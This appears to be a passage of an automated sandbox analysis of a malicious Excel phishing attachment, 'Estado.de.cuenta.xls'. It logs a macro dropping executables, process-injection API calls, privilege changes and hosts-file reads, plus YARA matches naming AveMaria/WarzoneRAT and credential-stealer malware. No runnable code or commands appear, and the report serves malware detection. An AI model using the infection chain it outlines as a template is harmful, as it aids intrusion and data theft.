                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd, String ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5
                Office process drops PE file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\ProgramData\msimages.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A65A8 NtWriteVirtualMemory,4_2_001A65A8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A6258 NtReadVirtualMemory,4_2_001A6258
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A6700 NtSetContextThread,4_2_001A6700
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A6388 NtResumeThread,4_2_001A6388
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A65A0 NtWriteVirtualMemory,4_2_001A65A0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A6250 NtReadVirtualMemory,4_2_001A6250
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A66F9 NtSetContextThread,4_2_001A66F9
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A6381 NtResumeThread,4_2_001A6381
                Source: C:\ProgramData\msimages.exeCode function: 11_2_004465A8 NtWriteVirtualMemory,11_2_004465A8
                Source: C:\ProgramData\msimages.exeCode function: 11_2_00446258 NtReadVirtualMemory,11_2_00446258
                Source: C:\ProgramData\msimages.exeCode function: 11_2_00446700 NtSetContextThread,11_2_00446700
                Source: C:\ProgramData\msimages.exeCode function: 11_2_00446388 NtResumeThread,11_2_00446388
                Source: C:\ProgramData\msimages.exeCode function: 11_2_004465A0 NtWriteVirtualMemory,11_2_004465A0
                Source: C:\ProgramData\msimages.exeCode function: 11_2_004466F9 NtSetContextThread,11_2_004466F9
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C65A8 NtWriteVirtualMemory,14_2_001C65A8
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C6258 NtReadVirtualMemory,14_2_001C6258
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C6700 NtSetContextThread,14_2_001C6700
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C6388 NtUnmapViewOfSection,14_2_001C6388
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C65A0 NtWriteVirtualMemory,14_2_001C65A0
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C6250 NtReadVirtualMemory,14_2_001C6250
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C66F9 NtSetContextThread,14_2_001C66F9
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C6381 NtUnmapViewOfSection,14_2_001C6381
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A68504_2_001A6850
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A4A694_2_001A4A69
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A1EC94_2_001A1EC9
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A0B084_2_001A0B08
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A43584_2_001A4358
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A57A04_2_001A57A0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A403F4_2_001A403F
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A40504_2_001A4050
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 4_2_001A57944_2_001A5794
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_00411BF86_2_00411BF8
                Source: C:\ProgramData\msimages.exeCode function: 11_2_0044685111_2_00446851
                Source: C:\ProgramData\msimages.exeCode function: 11_2_00444A6911_2_00444A69
                Source: C:\ProgramData\msimages.exeCode function: 11_2_00441EC911_2_00441EC9
                Source: C:\ProgramData\msimages.exeCode function: 11_2_0044435811_2_00444358
                Source: C:\ProgramData\msimages.exeCode function: 11_2_00440B0811_2_00440B08
                Source: C:\ProgramData\msimages.exeCode function: 11_2_004457A011_2_004457A0
                Source: C:\ProgramData\msimages.exeCode function: 11_2_0044405011_2_00444050
                Source: C:\ProgramData\msimages.exeCode function: 11_2_0044579411_2_00445794
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C685114_2_001C6851
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C4A5D14_2_001C4A5D
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C1EC914_2_001C1EC9
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C0B0814_2_001C0B08
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C435814_2_001C4358
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C57A014_2_001C57A0
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C403F14_2_001C403F
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C405014_2_001C4050
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C0AF914_2_001C0AF9
                Source: C:\ProgramData\msimages.exeCode function: 14_2_001C579414_2_001C5794
                Source: Estado.de.cuenta.xlsOLE, VBA macro line: Sub Workbook_Open()
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
                Source: Estado.de.cuenta.xlsOLE indicator, VBA macros: true
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: String function: 004035E5 appears 40 times
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: String function: 00410969 appears 47 times
                Source: 4.2.VPZVQXDUT.exe.3fb01e0.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 4.2.VPZVQXDUT.exe.2783860.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 11.2.msimages.exe.29b1654.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 14.2.msimages.exe.29af650.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 4.2.VPZVQXDUT.exe.3f97d70.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 6.2.VPZVQXDUT.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 6.2.VPZVQXDUT.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: asxhfzdhhz[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: VPZVQXDUT.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: msimages.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@18/5@73/2
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040F619 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,6_2_0040F619
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_004120B8 RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,6_2_004120B8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0041290F CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,6_2_0041290F
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_004130B3 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,6_2_004130B3
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeCode function: 6_2_0040D49C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_2_0040D49C
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exeJump to behavior
                Source: C:\ProgramData\msimages.exeMutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8075.tmpJump to behavior
                Source: Estado.de.cuenta.xlsOLE indicator, Workbook stream: true
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\msimages.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
